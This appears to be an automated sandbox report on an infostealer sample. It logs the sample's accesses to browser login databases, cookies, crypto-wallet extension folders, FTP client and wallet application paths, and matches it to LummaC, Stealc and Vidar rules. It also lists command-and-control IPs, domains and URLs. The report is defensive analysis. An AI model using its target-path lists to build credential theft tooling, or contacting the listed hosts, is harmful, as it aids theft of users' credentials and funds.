Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UBVUNTSCZJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UBVUNTSCZJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UBVUNTSCZJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UBVUNTSCZJ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1449515959.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1635741412.0000000005BD1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1592515790.00000000080B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558835 Sample: file.exe Startdate: 19/11/2024 Architecture: WINDOWS Score: 100 10 cook-rain.sbs 2->10 18 Suricata IDS alerts for network traffic 2->18 20 Found malware configuration 2->20 22 Antivirus detection for URL or domain 2->22 24 10 other signatures 2->24 6 file.exe 13 2->6         started        signatures3 process4 dnsIp5 12 185.215.113.206, 49876, 80 WHOLESALECONNECTIONSNL Portugal 6->12 14 185.215.113.16, 49839, 49840, 80 WHOLESALECONNECTIONSNL Portugal 6->14 16 cook-rain.sbs 188.114.97.3, 443, 49708, 49725 CLOUDFLARENETUS European Union 6->16 26 Detected unpacking (changes PE section rights) 6->26 28 Query firmware table information (likely to detect VMs) 6->28 30 Tries to detect sandboxes and other dynamic analysis tools (window names) 6->30 32 10 other signatures 6->32 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.97.3
 cook-rain.sbs European Union
13335 CLOUDFLARENETUS false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false

Contacted Domains

Name IP Active
cook-rain.sbs 188.114.97.3 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    peepburry828.sbs false
      		high
      p10tgrace.sbs false
        		high
        processhol.sbs false
          		high
          185.215.113.206/c4becf79229cb002.php false
            		high
            https://cook-rain.sbs/api false
              		high
              http://185.215.113.206/c4becf79229cb002.php false
                		high
                p3ar11fter.sbs false
                  		high